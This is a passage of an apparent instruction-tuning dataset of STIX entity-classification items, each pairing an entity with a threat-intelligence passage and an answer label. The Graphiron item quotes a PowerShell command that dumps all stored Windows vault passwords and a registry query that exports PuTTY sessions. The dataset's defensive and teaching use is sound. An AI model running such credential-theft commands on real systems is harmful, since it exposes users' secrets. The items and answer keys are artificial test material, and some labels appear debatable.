malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nKeep all operating systems, software, and firmware up to date\n\n---\n\n### Text Passage:\n**MITIGATIONS**\nThese mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems) thus strengthening the security posture for their customers.\nFor more information on secure by design, see CISA\u2019s Secure by Design webpage and joint guide.\nFBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Royal ransomware. These mitigations follow CISA\u2019s Cybersecurity Performance Goals (CPGs), which provide a minimum set of practices and protections that are informed by the most common and impactful threats, TTPs, and yield goals that all organizations across critical infrastructure sectors should implement.\n* **Implement a recovery plan** to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] n a physically separate, segmented, and secure location (i.e., hard drive, storage device, or the cloud).\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) **to comply** with the National Institute for Standards and Technology\u2019s (NIST\u2019s) standards for developing and managing password policies [CPG 3.4].\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [CPG 1.4].\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts [CPG 1.1].\n* Disable password hints.\n* Refrain from requiring password changes more frequently than once per year.\n**Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password patterns cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require multifactor authentication**[CPG 1.3] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Reduce the threat of malicious actors** using remote access tools by applying mitigations in joint Guide to Securing Remote Access Software.\n* **Keep all operating systems, software, and firmware up to date.** Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.\n* **Segment networks**[CPG 8.1]. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n* **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.** To aid in detecting ransomware, implement a tool that logs and reports all network traffic [CPG 5.1], including lateral movement activity on a network. Endpoint detection and response (EDR) tools are useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n* **Install, regularly update, and enable real time detection for antivirus software** on all hosts.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 1.5].\n* **Disable unused ports**.\n* **Consider adding an email banner to emails**[CPG 8.3] received from outside your organization.\n* **Implement time-based access for accounts set at the admin level and higher.** For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the PoLP (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the active directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n* **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n* **Maintain offline backups of data,** and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.\n* **Ensure all backup data is encrypted, immutable**(i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure [CPG 3.3].\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nKryptoCibule\n\n---\n\n### Text Passage:\nTargets\nAccording to ESET telemetry (shown in Figure 3), the malware seems to target mostly users in Czechia (the Czech Republic) and Slovakia. This reflects the user base of the site on which the infected torrents are found.\n_Figure 3. In our telemetry data, over 85% of detections were located in Czechia and Slovakia_\nAlmost all the malicious torrents were available on uloz.to; a popular file sharing site in Czechia and Slovakia (see Figure 4). We'll explain how these torrents are used to spread KryptoCibule in the next section.\n_Figure 4. One of the malicious torrents on uloz.to_\nAs detailed in the _Anti-detection and anti-analysis techniques_ section below, KryptoCibule specifically checks for ESET, Avast, and AVG endpoint security products; ESET is headquartered in Slovakia, while the other two are owned by Avast, which is headquartered in Czechia.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nESET\n\n---\n\n### Text Passage:\nTargets\nAccording to ESET telemetry (shown in Figure 3), the malware seems to target mostly users in Czechia (the Czech Republic) and Slovakia. This reflects the user base of the site on which the infected torrents are found.\n_Figure 3. In our telemetry data, over 85% of detections were located in Czechia and Slovakia_\nAlmost all the malicious torrents were available on uloz.to; a popular file sharing site in Czechia and Slovakia (see Figure 4). We'll explain how these torrents are used to spread KryptoCibule in the next section.\n_Figure 4. One of the malicious torrents on uloz.to_\nAs detailed in the _Anti-detection and anti-analysis techniques_ section below, KryptoCibule specifically checks for ESET, Avast, and AVG endpoint security products; ESET is headquartered in Slovakia, while the other two are owned by Avast, which is headquartered in Czechia.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSlovakia\n\n---\n\n### Text Passage:\nTargets\nAccording to ESET telemetry (shown in Figure 3), the malware seems to target mostly users in Czechia (the Czech Republic) and Slovakia. This reflects the user base of the site on which the infected torrents are found.\n_Figure 3. In our telemetry data, over 85% of detections were located in Czechia and Slovakia_\nAlmost all the malicious torrents were available on uloz.to; a popular file sharing site in Czechia and Slovakia (see Figure 4). We'll explain how these torrents are used to spread KryptoCibule in the next section.\n_Figure 4. One of the malicious torrents on uloz.to_\nAs detailed in the _Anti-detection and anti-analysis techniques_ section below, KryptoCibule specifically checks for ESET, Avast, and AVG endpoint security products; ESET is headquartered in Slovakia, while the other two are owned by Avast, which is headquartered in Czechia.\n",
"output": "LOCATION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nCzech Republic\n\n---\n\n### Text Passage:\nTargets\nAccording to ESET telemetry (shown in Figure 3), the malware seems to target mostly users in Czechia (the Czech Republic) and Slovakia. This reflects the user base of the site on which the infected torrents are found.\n_Figure 3. In our telemetry data, over 85% of detections were located in Czechia and Slovakia_\nAlmost all the malicious torrents were available on uloz.to; a popular file sharing site in Czechia and Slovakia (see Figure 4). We'll explain how these torrents are used to spread KryptoCibule in the next section.\n_Figure 4. One of the malicious torrents on uloz.to_\nAs detailed in the _Anti-detection and anti-analysis techniques_ section below, KryptoCibule specifically checks for ESET, Avast, and AVG endpoint security products; ESET is headquartered in Slovakia, while the other two are owned by Avast, which is headquartered in Czechia.\n",
"output": "LOCATION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nAvast\n\n---\n\n### Text Passage:\nTargets\nAccording to ESET telemetry (shown in Figure 3), the malware seems to target mostly users in Czechia (the Czech Republic) and Slovakia. This reflects the user base of the site on which the infected torrents are found.\n_Figure 3. In our telemetry data, over 85% of detections were located in Czechia and Slovakia_\nAlmost all the malicious torrents were available on uloz.to; a popular file sharing site in Czechia and Slovakia (see Figure 4). We'll explain how these torrents are used to spread KryptoCibule in the next section.\n_Figure 4. One of the malicious torrents on uloz.to_\nAs detailed in the _Anti-detection and anti-analysis techniques_ section below, KryptoCibule specifically checks for ESET, Avast, and AVG endpoint security products; ESET is headquartered in Slovakia, while the other two are owned by Avast, which is headquartered in Czechia.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nAVG\n\n---\n\n### Text Passage:\nTargets\nAccording to ESET telemetry (shown in Figure 3), the malware seems to target mostly users in Czechia (the Czech Republic) and Slovakia. This reflects the user base of the site on which the infected torrents are found.\n_Figure 3. In our telemetry data, over 85% of detections were located in Czechia and Slovakia_\nAlmost all the malicious torrents were available on uloz.to; a popular file sharing site in Czechia and Slovakia (see Figure 4). We'll explain how these torrents are used to spread KryptoCibule in the next section.\n_Figure 4. One of the malicious torrents on uloz.to_\nAs detailed in the _Anti-detection and anti-analysis techniques_ section below, KryptoCibule specifically checks for ESET, Avast, and AVG endpoint security products; ESET is headquartered in Slovakia, while the other two are owned by Avast, which is headquartered in Czechia.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nuloz.to\n\n---\n\n### Text Passage:\nTargets\nAccording to ESET telemetry (shown in Figure 3), the malware seems to target mostly users in Czechia (the Czech Republic) and Slovakia. This reflects the user base of the site on which the infected torrents are found.\n_Figure 3. In our telemetry data, over 85% of detections were located in Czechia and Slovakia_\nAlmost all the malicious torrents were available on uloz.to; a popular file sharing site in Czechia and Slovakia (see Figure 4). We'll explain how these torrents are used to spread KryptoCibule in the next section.\n_Figure 4. One of the malicious torrents on uloz.to_\nAs detailed in the _Anti-detection and anti-analysis techniques_ section below, KryptoCibule specifically checks for ESET, Avast, and AVG endpoint security products; ESET is headquartered in Slovakia, while the other two are owned by Avast, which is headquartered in Czechia.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nPEToolW\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", 